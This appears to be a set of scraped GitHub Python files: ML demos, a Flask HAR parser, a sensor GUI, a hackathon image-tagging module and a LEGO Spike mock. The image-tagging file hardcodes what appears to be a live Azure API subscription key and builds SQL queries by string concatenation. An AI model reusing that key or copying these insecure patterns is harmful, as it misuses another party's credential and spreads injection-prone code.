the mini-batch)\n mu = Gaussian(np.zeros(D), np.identity(D),\n plates=(K,),\n name='means')\n alpha = Dirichlet(np.ones(K),\n name='class probabilities')\n Z = Categorical(alpha,\n plates=(N_batch,),\n plates_multiplier=(N/N_batch,),\n name='classes')\n Y = Mixture(Z, Gaussian, mu, np.identity(D),\n name='observations')\n\n # Break symmetry with random initialization of the means\n mu.initialize_from_random()\n\n # Inference engine\n Q = VB(Y, Z, mu, alpha, autosave_filename=Q.autosave_filename)\n Q.load(mu)\n\n # Because using mini-batches, messages need to be multiplied appropriately\n print(\"Stochastic variational inference...\")\n Q.ignore_bound_checks = True\n\n maxiter *= int(N/N_batch)\n delay = 1\n forgetting_rate = 0.7\n for n in range(maxiter):\n\n # Observe a mini-batch\n subset = np.random.choice(N, N_batch)\n Y.observe(data[subset,:])\n\n # Learn intermediate variables\n Q.update(Z)\n\n # Set step length\n step = (n + delay) ** (-forgetting_rate)\n\n # Stochastic gradient for the global variables\n Q.gradient_step(mu, alpha, scale=step)\n\n if np.sum(Q.cputime[:n]) > max_cputime:\n break\n \n if plot:\n bpplt.pyplot.plot(np.cumsum(Q.cputime), Q.L, 'r:')\n\n bpplt.pyplot.xlabel('CPU time (in seconds)')\n bpplt.pyplot.ylabel('VB lower bound')\n bpplt.pyplot.legend(['VB-EM', 'Stochastic inference'], loc='lower right')\n bpplt.pyplot.title('VB for Gaussian mixture model')\n\n return\n\n\nif __name__ == '__main__':\n import sys, getopt, os\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"\",\n [\"n=\",\n \"batch=\",\n \"seed=\",\n \"maxiter=\"])\n except getopt.GetoptError:\n print('python stochastic_inference.py ')\n print('--n= Number of data points')\n print('--batch= Mini-batch size')\n print('--maxiter= Maximum number of VB iterations')\n print('--seed= Seed (integer) for the random number generator')\n sys.exit(2)\n\n kwargs = {}\n for opt, arg in opts:\n if opt == \"--maxiter\":\n kwargs[\"maxiter\"] = int(arg)\n elif opt == \"--seed\":\n kwargs[\"seed\"] = int(arg)\n elif opt in (\"--n\",):\n kwargs[\"N\"] = int(arg)\n elif opt in (\"--batch\",):\n kwargs[\"N_batch\"] = int(arg)\n\n run(**kwargs)\n\n plt.show()\n\n","repo_name":"bayespy/bayespy","sub_path":"bayespy/demos/stochastic_inference.py","file_name":"stochastic_inference.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"66"} +{"seq_id":"6288627195","text":"from keras.models import model_from_json\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport numpy as np\nwith open(\"test_content.bin\",\"rb\") as f:\n content=np.load(f)\nX_test=content.astype(np.float32)\nwith open(\"test_result.bin\",\"rb\") as f:\n result=np.load(f)\nY_test=np.expand_dims(result, axis=1).astype(np.float32)\nmodel = model_from_json(open('model1.json').read())\nmodel.load_weights(\"hehe1.h5\")\nhehe=model.predict(X_test)\nresult=[]\nfor item in hehe:\n if item<0.5:\n result.append(0)\n if item>0.5:\n result.append(1)\nfpr, tpr, thresholds = metrics.roc_curve(Y_test, hehe, pos_label=1)\nauc_value=metrics.auc(fpr, tpr)\nscore=model.evaluate(X_test,Y_test)\nplt.plot(fpr,tpr)\nplt.show()\n","repo_name":"Duum/biyesheji","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15924000064","text":"import os\nimport sqlalchemy\n# from sqlalchemy import create_engine\n# from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey\nimport psycopg2\nfrom flask.ext.sqlalchemy import SQLAlchemy #uses extention in this file\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nimport glob\nimport os, shutil, os.path\nfrom os import walk\nfrom os import listdir\nfrom os.path import isfile, join\nimport requests,random\nfrom requests.exceptions import HTTPError\n\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"PkeyGCP.json\"\nimport google.cloud.storage\n\ndef imageNameToVStrings(index):\n f = []\n\n for (dirpath, dirnames, filenames) in walk('pics/'):\n f.extend(filenames)\n break\n\n\n return (addCloud(f, index))\n\n\n\n\n\ndef addCloud(source_file_names, index):\n # Create a storage client.\n storage_client = google.cloud.storage.Client()\n bucket_name = 'userpictures1'\n bucket = storage_client.get_bucket(bucket_name)\n subscription_key = \"1ce10fd9a4b142f9b31c020ec61d2393\"\n assert subscription_key\n for source_file_name in source_file_names:\n blob = bucket.blob(os.path.basename(\"/pics/\" + source_file_name))\n # Upload the local file to Cloud Storage.\n blob.upload_from_filename(\"/pics/\" + source_file_name)\n url = (\"https://storage.googleapis.com/userpictures1/\" + source_file_name)\n vision_base_url = \"https://eastus.api.cognitive.microsoft.com/vision/v1.0/\"\n vision_analyze_url = vision_base_url + \"analyze\"\n doc = \"\"\n try:\n headers = {'Ocp-Apim-Subscription-Key': subscription_key }\n params = {'visualFeatures': 'Tags'}\n data = {'url': url}\n response = requests.post(vision_analyze_url, headers=headers, params=params, json=data)\n response.raise_for_status()\n analysis = response.json()\n for ele in analysis[\"tags\"]:\n intWeight = int(round(ele[\"confidence\"]*10))\n tag = ele[\"name\"]+ \" \"\n for i in range(intWeight):\n doc += tag\n if \"person\" in doc:\n con = None\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n tempPrivate = \"\"\n cur.execute(\"SELECT * FROM users WHERE uid = \" + str(index))\n row = cur.fetchone()\n tempPrivate += row[10]\n tempPrivate += url + \" \"\n cur.execute(\"UPDATE users SET private=%s WHERE uid = \"+ str(index), (tempPrivate))\n con.commit()\n else:\n con = None\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n tempPublic = \"\"\n cur.execute(\"SELECT * FROM users WHERE uid = \"+str(index))\n row = cur.fetchone()\n tempPublic += row[9]\n tempPublic += url + \" \"\n cur.execute(\"UPDATE users SET image=%s WHERE uid = \" + str(index), (tempPublic))\n con.commit()\n except:\n print(\"damn\")\n finally:\n if con:\n con.close()\n folder = 'pics/'\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef returnTopThree(index):\n con = None\n docs = []\n try:\n con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n cur = con.cursor()\n qur = \"SELECT * FROM users WHERE uid = \" + str(index)\n cur.execute(qur)\n row = cur.fetchone()\n tempOrientation = row[7]\n print(tempOrientation)\n qur = \"SELECT * FROM users\"\n cur.execute(qur)\n while(True):\n row = cur.fetchone()\n if (row == None):\n break\n if(row[6] == tempOrientation):\n docs.append(row[11])\n except :\n if con:\n con.rollback()\n\n return -1\n finally:\n if con:\n con.close()\n tfidf = TfidfVectorizer().fit_transform(docs)\n cosine_similarities = linear_kernel(tfidf[index-1:index], tfidf).flatten()\n matches = sorted(range(len(cosine_similarities)), key=lambda i:cosine_similarities[i])[::-1][1:4]\n return matches\n\nimageNameToVStrings(5)\n\n\n\n\n\n\n\n# def addAndUpdate(source_file_name, index):\n# url = addCloud(source_file_name)\n# subscription_key = \"1ce10fd9a4b142f9b31c020ec61d2393\"\n# assert subscription_key\n# vision_base_url = \"https://eastus.api.cognitive.microsoft.com/vision/v1.0/\"\n# vision_analyze_url = vision_base_url + \"analyze\"\n# doc = \"\"\n# try:\n# headers = {'Ocp-Apim-Subscription-Key': subscription_key }\n# params = {'visualFeatures': 'Tags'}\n# data = {'url': URL}\n# response = requests.post(vision_analyze_url, headers=headers, params=params, json=data)\n# response.raise_for_status()\n# analysis = response.json()\n# for ele in analysis[\"tags\"]:\n# intWeight = int(round(ele[\"confidence\"]*10))\n# tag = ele[\"name\"]+ \" \"\n# for i in range(intWeight):\n# doc += tag\n# if \"person\" in doc:\n# con = None\n# docs = []\n# con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n# cur = con.cursor()\n# tempPrivate = \"\"\n# cur.execute(\"SELECT * FROM users WHERE Id=%s\", (index))\n# row = cur.fetchone()\n# tempPrivate += row[10]\n# tempPrivate += url + \" \"\n# cur.execute(\"UPDATE users SET private=%s WHERE Id=%s\", (tempPrivate, index))\n# con.commit()\n# else:\n# con = None\n# docs = []\n# con = psycopg2.connect(\"host='localhost' dbname='hackillinois2018'\")\n# cur = con.cursor()\n# tempPublic = \"\"\n# cur.execute(\"SELECT * FROM users WHERE Id=%s\", (index))\n# row = cur.fetchone()\n# tempPublic += row[9]\n# tempPublic += url + \" \"\n# cur.execute(\"UPDATE users SET image=%s WHERE Id=%s\", (tempPublic, index))\n# con.commit()\n# except:\n# print(\"damn\")\n# finally:\n# if con:\n# con.close()\n\n\n\n\n\n\n#def createUserTags():\n\n\n#INSERT INTO users(firstname, lastname, email, birthday, sex, orientation, location, address, pwdhash, image, private, tags, matched, flag, priv)\n","repo_name":"augustgress/hackillinois2018","sub_path":"WebGUI/GCPfunctions.py","file_name":"GCPfunctions.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43195984095","text":"import time\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom Sensor_Data_absorber import Get_Sensor_values_degital\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg,FigureCanvasAgg\nimport PySimpleGUI as sg\n\n\n\ndef colorblind(size,color):\n if 6 <= size <= 7:\n c = color\n elif 5 <= size < 6:\n c = 'darkgreen'\n elif 4 <= size < 5:\n c = 'olive'\n elif 3 <= size < 4:\n c = 'gold'\n elif 2 <= size < 3:\n c = 'orange'\n elif 1 <= size < 2:\n c = 'orangered'\n elif 0 <= size < 1:\n c = 'tomato'\n elif size < 0:\n c = 'red'\n else:\n c = color\n return (c)\n\n\ndef draw_figure(canvas, figure, loc=(0, 0)):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\n return figure_canvas_agg\n\ndef figure_draw_1(fig2,ax2,mean,fig_agg2,j,xax):\n ax2.cla()\n ax2.grid()\n ax2.plot(xax, mean, color='blue', label=\"average\")\n ax2.set_xlabel(\"time\")\n ax2.set_ylabel(\"sensor average\")\n ax2.set_xlim(left=max(0, j - 50), right=j + 50)\n ax2.set_ylim(ymin=0, ymax=300)\n ax2.legend(loc=\"upper left\")\n return (fig_agg2)\n\n\ndef square_maker(ax,fig_agg,center,size,color):\n rep,i,rep1,rep2,rep3,k,rep4,j=[],0,[0,0,0],[],[],0,[0,0,0],0\n while i < len(center) :\n rep.append(np.linspace(center[i] - size[i] / 2, center[i] + size[i] / 2, num=10))\n i+=1\n rep1[0], rep4[0] = np.meshgrid(rep[1], rep[2])\n rep1[1], rep4[1] = np.meshgrid(rep[0], rep[2])\n rep1[2], rep4[2] = np.meshgrid(rep[0], rep[1])\n while k < len(rep1):\n rep2.append(np.ones_like(rep1[k]) * (center[k] - size[k] / 2))\n rep3.append(np.ones_like(rep1[k]) * (center[k] + size[k] / 2))\n k+=1\n p = colorblind(size[0],color)\n ax.plot_wireframe(rep3[0], rep1[0], rep4[0], color=p, rstride=1, cstride=1, alpha=0.6)\n ax.plot_wireframe( rep1[1], rep2[1], rep4[1], color='gray', rstride=1, cstride=1, alpha=0.6)\n ax.plot_wireframe( rep1[1], rep3[1], rep4[1], color='gray', rstride=1, cstride=1, alpha=0.6)\n return (ax, fig_agg)\n\n\n\n\ndef make_cube_ulti_new_oof(ax,data, fig_agg):\n ses = 7\n list1 = [[(((7 - (data[4])) / 2) - (14 - ses)), 0, 0],\n [(((7 - (data[0])) / 2) - (14 - ses)), 7.5, 0],\n [(((7 - (data[5])) / 2) - (14 - ses)), 0, 7.5],\n [(((7 - (data[1])) / 2) - (14 - ses)), 7.5, 7.5],\n [(((7 - data[6]) / 2) - (14 - ses)), 0, 15],\n [(((7 - data[2]) / 2) - (14 - ses)), 7.5, 15],\n [(((7 - (data[7])) / 2) - (14 - ses)), 0, 22.5],\n [(((7 - (data[3])) / 2) - (14 - ses)), 7.5, 22.5]]\n list2 = [(7 - ((data[4])), 7.5, 7.5), (7 - (data[0]), 7.5, 7.5),\n (7 - (data[5]), 7.5, 7.5),(7 - (data[1]), 7.5, 7.5),\n (7 - (data[6]), 7.5, 7.5),(7 - (data[6]), 7.5, 7.5),\n (7 - (data[7]), 7.5, 7.5), (7 - (data[3]), 7.5, 7.5)]\n list3 = ['b', 'b', 'g', 'g', 'g', 'g', 'b', 'b']\n i = 0\n ax.cla()\n\n while i< len(list3):\n ax, fig_agg = square_maker(ax,fig_agg,list1[i],list2[i],list3[i])\n i+= 1\n ax.set_xlim(-15, 15)\n ax.set_zlim(000, 18)\n return(fig_agg)\n\n\n\n\n\ndef Liniar_display(PORT):\n layout = [[sg.Canvas(key='-CANVAS-2')]]\n gui = sg.Window(title=\"Live Feed figure\", layout=layout, size=(1500, 900), finalize=True,\n resizable=True, element_justification='c')\n gui.Maximize()\n canvas_elem2 = gui['-CANVAS-2']\n canvas2 = canvas_elem2.TKCanvas\n fig2, ax2 = plt.subplots(1, 1)\n fig2.set_size_inches(15, 6)\n ax2.grid()\n fig_agg2 = draw_figure(canvas2, fig2)\n mean, xax, j = [], [], 0\n while True:\n (event, values) = gui.read(timeout=0)\n mean.append(Get_Sensor_values_degital(PORT))\n j = j + 1\n xax.append(j)\n fig_agg2 = figure_draw_1(fig2, ax2, mean, fig_agg2, j, xax)\n fig_agg2.draw()\n if event == sg.WIN_CLOSED:\n gui.close()\n break\n sys.exit()\n return ()\n\n\ndef three_D_display(PORT):\n data1 = [0, 0, 0, 0, 0, 0, 0, 0]\n data = [0, 0, 0, 0, 0, 0, 0, 0]\n layout = [[sg.Canvas(key='-CANVAS-')]]\n gui = sg.Window(title=\"Live Feed figure\", layout=layout, size=(800, 1000), finalize=True,\n resizable=True, element_justification='c')\n gui.Maximize()\n canvas_elem = gui['-CANVAS-']\n canvas = canvas_elem.TKCanvas\n fig = plt.figure()\n fig.set_size_inches(8, 8)\n ax = fig.add_subplot(projection='3d')\n fig_agg = draw_figure(canvas, fig)\n while True:\n (event, values) = gui.read(timeout=0)\n puredata = Get_Sensor_values_degital(PORT)\n for i in range(0, len(puredata)):\n data[i] = puredata[i] * 7 / 250\n fig_agg = make_cube_ulti_new_oof(ax, data, fig_agg,)\n fig_agg.draw()\n\n if event == sg.WIN_CLOSED:\n gui.close()\n break\n sys.exit()\n\n return ()\n\n","repo_name":"NizarMhatli/Touchence_sensor_python_gui","sub_path":"Data_display_options.py","file_name":"Data_display_options.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22031303504","text":"'''\nFor a given model family and a dataset: (resnet1d_3342, cifar100)\nThis script evaluates the manifold distance between each test image and the training set.\n'''\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport shutil\nimport time\nimport random\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport models.cifar as models\nimport faiss\n\nfrom utils import Bar, Logger, AverageMeter, accuracy, mkdir_p, savefig\nfrom scipy.spatial import KDTree\n\n# ['alexnet', 'bottleneck', 'conv_1_7x7', 'densenet', 'identity_block3', 'preresnet', 'resnet', 'resnext', 'vgg11',\n# 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19', 'vgg19_bn', 'wrn']\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\n# Use CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Random seed\nmanualSeed = random.randint(1, 10000)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\nif use_cuda:\n torch.cuda.manual_seed_all(manualSeed)\n\n\ndef main():\n dataset = 'cifar100'\n arch = 'resnet50'\n model_type = 'resnet50_shuffle_bad_1142'\n layer = 11\n\n workers = 4\n test_batch = 100\n\n print('==> Preparing dataset %s' % dataset)\n tfms = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n if dataset == 'cifar10':\n dataloader = datasets.CIFAR10\n num_classes = 10\n elif dataset == 'cifar100':\n dataloader = datasets.CIFAR100\n num_classes = 100\n elif dataset == 'svhn':\n dataloader = datasets.SVHN\n num_classes = 10\n else:\n raise Exception('Only support CIFAR and SVHN!!!')\n\n trainset = dataloader(root='/data/users/yuefan/fanyue/dconv/data', train=True, download=True,\n transform=tfms)\n trainloader = data.DataLoader(trainset, batch_size=test_batch, shuffle=True, num_workers=workers)\n testset = dataloader(root='/data/users/yuefan/fanyue/dconv/data', train=False, download=True,\n transform=tfms)\n testloader = data.DataLoader(testset, batch_size=test_batch, shuffle=False, num_workers=workers)\n\n model_nums = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]\n\n for model_num in model_nums:\n resume = '/data/users/yuefan/fanyue/dconv/checkpoints/' + dataset + '/' + model_type + '_' + str(model_num) + '_60/model_best.pth.tar'\n print(resume)\n\n if arch.startswith('resnet50'):\n model = models.__dict__[arch](\n num_classes=num_classes,\n include_top=False,\n dropout_rate=0,\n layer=layer\n )\n elif arch.startswith('d1_resnet50'):\n model = models.__dict__[arch](\n num_classes=num_classes,\n include_top=False,\n dropout_rate=0,\n layer=layer,\n is_shuff=False # TODO: check\n )\n else:\n raise Exception('The arch is not supported!')\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n assert os.path.isfile(resume), 'Error: no checkpoint directory found!'\n checkpoint = torch.load(resume)\n model.load_state_dict(checkpoint['state_dict'])\n\n saved_path = '/data/users/yuefan/fanyue/dconv/maruis_conjecture/'+dataset+'/'+model_type+'_'+str(model_num)+'/'\n if not os.path.isdir(saved_path):\n mkdir_p(saved_path)\n\n test_data_represent_list = test(testloader, model, use_cuda, 10000) # 335MB\n test_data_represent_list = np.array(test_data_represent_list)\n train_data_represent_list = test(trainloader, model, use_cuda, 50000) # 1.6GB\n train_data_represent_list = np.array(train_data_represent_list)\n\n index = faiss.IndexFlatL2(512) # build the index IndexFlatIP\n print(index.is_trained)\n index.add(train_data_represent_list) # add vectors to the index\n print(index.ntotal)\n\n k = 5 # we want to see 5 nearest neighbors\n D, I = index.search(train_data_represent_list, k) # actual search\n np.save(saved_path + 'train_img_manidist_I.npy', I)\n np.save(saved_path + 'train_img_manidist_D.npy', D) # TODO: note D is the squared euclidean distance\n \n # # np.save(save_path+'test.npy', test_data_represent_list)\n #\n \n # # np.save(save_path + 'train.npy', train_data_represent_list)\n #\n # # compute the manifold distance for each of the test image\n # del model\n # tree = KDTree(train_data_represent_list)\n # distances, _ = tree.query(test_data_represent_list, k=5, p=2)\n # distances = np.array(distances).mean(axis=1)\n # np.save(save_path + 'test_img_manidist_list.npy', distances)\n\n\ndef test(testloader, model, use_cuda, loader_len):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n data_represent_list = []\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n bar = Bar('Processing', max=len(testloader))\n for batch_idx, (inputs, targets) in enumerate(testloader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = torch.autograd.Variable(inputs), torch.autograd.Variable(targets)\n\n # compute output\n outputs = model(inputs)\n outputs = torch.nn.functional.avg_pool2d(outputs, kernel_size=(4, 4), stride=(1, 1))\n outputs = outputs.view(outputs.size(0), -1)\n\n data_represent_list.extend(outputs.detach().cpu().numpy())\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:}'.format(\n batch=batch_idx + 1,\n size=len(testloader),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td\n )\n bar.next()\n bar.finish()\n return data_represent_list\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YUE-FAN/shuffle","sub_path":"OtherBranch/cifar_marius.py","file_name":"cifar_marius.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24467267971","text":"from flask import Flask\nfrom flask import request\nimport json\nimport pprint\nimport sys\nfrom urllib.parse import urlparse\nfrom flask import render_template\nfrom google.cloud import storage\nimport time\nimport argparse\nimport pprint\npp = pprint.PrettyPrinter(indent=4)\n\nfrom haralyzer import HarParser, HarPage\n\ndef linkify(url):\n \"\"\"takes a URL and returns the HTML for a link to the URL\"\"\"\n # url = \"url to make into an HTML link\"\n hyperlink_format = '{text}'\n return hyperlink_format.format(link=url, text=url)\n \ndef upload_blob(bucket_name, stuff, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_string(stuff)\n \ndef parse_file(f):\n har_parser = HarParser(json.loads(f))\n\n rows = [['X-CACHE-HEADER', 'BYTES', 'URL']]\n\n hosts = {}\n size = {}\n total_bytes = 0 #total bytes for all content across the entire thing \n\n for page in har_parser.pages:\n assert isinstance(page, HarPage)\n for entry in page.entries:\n cdn = []\n headers = entry['response']['headers']\n #print(entry['response'], file=sys.stderr)\n cdn_str = None\n total_bytes += entry['response']['content']['size']\n #pp.pprint(entry['request'])\n url = urlparse(entry['request']['url'])\n for h in headers: \n if( h['name'] == 'x-cache'):\n hosts[url.netloc] = 1\n #print(url, file=sys.stderr)\n cdn_str = h['value']\n cdn.append(cdn_str)\n \n if( cdn_str in size ):\n size[cdn_str] = size[cdn_str] + entry['response']['content']['size']\n else:\n size[cdn_str] = entry['response']['content']['size']\n print(\"\\t\".join([str(cdn), str(entry['response']['content']['size']), entry['request']['url'], url.netloc]))\n rows.append([cdn, entry['response']['content']['size'], linkify(entry['request']['url'])])\n \n bysize = [['CACHE TAG', '% OF BYTES']]\n for sk in size.keys():\n bysize.append( [sk, \"{:.1%}\".format(size[sk] / total_bytes)] )\n \n bysize_t = list(map(list, zip(*bysize))) \n hosts_t = list(map(list, zip(*[hosts.keys()]))) \n return {'total_bytes':total_bytes, 'hosts_t':hosts_t, 'bysize':bysize, 'rows':rows} \n #return json.dumps([hosts, size, rows])\n \n\n# If `entrypoint` is not defined in app.yaml, App Engine will look for an app\n# called `app` in `main.py`.\napp = Flask(__name__)\n\n@app.route('/')\ndef write_form():\n \"\"\"Render landing page with instructions and form to upload an HAR file\"\"\"\n return render_template('form.html', title='Home')\n \n@app.route('/upload_file', methods=['POST'])\ndef upload_file():\n \"\"\"Process the uploaded file. Save a copy to a cloud bucket. Then parse out the headers and grab the x-cache headers that show which CDN it loaded from\"\"\"\n f = request.files['yourFileName'].read()\n try:\n ts = time.time()\n upload_blob('cdninfolyzer.appspot.com', f, \"data/\" + str(ts))\n except Exception as e:\n print (e)\n r = parse_file(f)\n return render_template('results.html', titles=['', 'Total bytes', 'Hosts', 'By Service', 'Results' ], tables=[[['Total bytes:', r['total_bytes']]],r['hosts_t'], r['bysize'], r['rows']])\n \n@app.route('/list_files')\ndef do_list_files():\n \"\"\"Lists all buckets.\"\"\"\n\n\n \"\"\"Lists all the blobs in the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n\n storage_client = storage.Client()\n\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(\"cdninfolyzer.appspot.com\" ,prefix=\"data/\")\n\n blist = []\n\n for blob in blobs:\n blist.append(blob.name)\n\n return str(blist)\n \n@app.route('/results')\ndef do_results():\n \"\"\"display static results page\"\"\"\n return render_template('all_results.html', title='Home')\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='process session files')\n parser.add_argument('--bulk', nargs='+', type=open, help='upload all files matching to database')\n args = parser.parse_args()\n\n \n if args.bulk:\n print (\"bulk\")\n \n for a in args.bulk:\n \n #print ( parse_file (a.read())['bysize'] , file=sys.io.stderr)\n try: \n print ( parse_file (a.read())['bysize'] , file=sys.io.stderr)\n except Exception as e:\n print (e)\n \n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. This\n # can be configured by adding an `entrypoint` to app.yaml.\n else:\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python38_app]\n","repo_name":"adervish/cdn","sub_path":"cdn_gae/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23500019290","text":"from time import sleep\nfrom threading import Lock\n\n# Local includes\nfrom spike.scenario.scenario import Scenario\n\nclass Button() :\n \"\"\" Hub button mocking class.\n\n Class is accessed simultaneously by the user side thread and the\n ground truth update thread. It is therefore protected by a mutex\n \"\"\"\n\n # Constants\n s_sides = ['left', 'right']\n\n # Static variables\n s_shared_scenario = Scenario()\n\n####################################### SPIKE API METHODS ########################################\n\n def __init__(self, side) :\n \"\"\"\n Contructor\n\n :param side: button side (left or right)\n :type side: string\n \"\"\"\n\n self.__mutex = Lock()\n\n self.__is_pressed = False\n self.__was_pressed = False\n\n self.s_shared_scenario.register(self, side)\n\n def wait_until_pressed(self) :\n \"\"\" Wait until the button is pressed\"\"\"\n while not self.is_pressed() : sleep(0.01)\n\n def wait_until_released(self) :\n \"\"\" Wait until the button is released\"\"\"\n while self.is_pressed() : sleep(0.01)\n\n def was_pressed(self) :\n \"\"\"\n Tests to see whether the button has been pressed since the last time this method called.\n Once this method returns \"true,\" the button must be released and pressed again before it\n will return \"true\" again.\n\n :return: True if the button was pressed, false otherwise\n :rtype: boolean\n \"\"\"\n\n result = None\n with self.__mutex :\n result = self.__was_pressed\n self.__was_pressed = False\n\n return result\n\n def is_pressed(self) :\n \"\"\"\n Tests whether the button is pressed.\n\n :return: True if the button is pressed, otherwise false\n :rtype: boolean\n \"\"\"\n\n result = None\n with self.__mutex :\n result = self.__is_pressed\n return result\n\n######################################## SCENARIO METHODS ########################################\n\n def c_reset(self) :\n \"\"\"\n Reset function\n\n .. warning:: This function is not part of the spike API. It is provided to update the\n component from scenario data and shall not be used by the end-user.\n\n \"\"\"\n with self.__mutex :\n self.__is_pressed = False\n self.__was_pressed = False\n\n def c_read(self, is_pressed) :\n \"\"\"\n Button status setting function\n\n .. warning:: This function is not part of the spike API. It is provided to update the\n component from scenario data and shall not be used by the end-user.\n\n :param is_pressed: True if button is pressed, false otherwise\n :type is_pressed: boolean\n \"\"\"\n with self.__mutex :\n self.__is_pressed = is_pressed\n if not self.__was_pressed :\n self.__was_pressed = self.__is_pressed\n","repo_name":"nadegelemperiere/spike-mock","sub_path":"spike/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43008883764","text":"from sklearn.metrics import r2_score, mean_absolute_error\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\n\nclass NeuralNetwork:\n\n# Neural Network Class using TensorFlow\n# Multiple layers can be constructed by passing\n# n_nodes: number of layers in each layer as a list\n# actf: activation fuction in each layer\n# dropout: True or False in a list that designates whether dropout exists in each layer.\n# training_epochs: the number of training iteration steps\n# learning_rate: the learning rate of gradient descent algorithm\n# random_seed: the random seed number for reproducing the results. \n\n def __init__(self, sess, n_samples, n_features, n_nodes=[10,5,2], actf=[tf.nn.relu, tf.nn.relu, tf.nn.sigmoid], \\\n dropout = [True, True, False],\\\n training_epochs=1000, learning_rate=0.001,\\\n batch_size=128, random_seed = 2):\n self.sess = sess\n self.n_samples = n_samples\n tf.set_random_seed(random_seed)\n self.X = tf.placeholder(tf.float32)\n self.y = tf.placeholder(tf.float32)\n self.batch_size = batch_size\n self.n_nodes = [n_features] + n_nodes\n self.nlayers = len(self.n_nodes) #number of layers including input and hidden layers\n self.dropout = dropout\n self.training_epochs = training_epochs\n self.hidden_layer = []\n self.actf = actf\n\n # set the weights/biases in the hidden layer\n if self.nlayers >= 2:\n for i in range(self.nlayers-1):\n self.hidden_layer.append({'weights':tf.Variable(tf.truncated_normal([self.n_nodes[i], self.n_nodes[i+1]], stddev=0.05)),\n 'biases':tf.Variable(tf.truncated_normal([self.n_nodes[i+1]], stddev=0.05))})\n\n # set the weights/biases in the output layer\n self.output_layer = {'weights': tf.Variable(tf.truncated_normal([self.n_nodes[-1], 2], stddev=0.05)),\n 'biases': tf.Variable(tf.truncated_normal([2], stddev=0.05))}\n\n # keep probability of drop-out.\n self.keep_prob = tf.placeholder(tf.float32)\n\n # calculate prediction given features X\n self.y_pred = self.MLP_model(self.X)\n\n # calculate cost\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=self.y_pred))\n\n # set the optimizer\n self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.cost)\n\n def MLP_model(self, X):\n #Create multi level perceptron model (feed 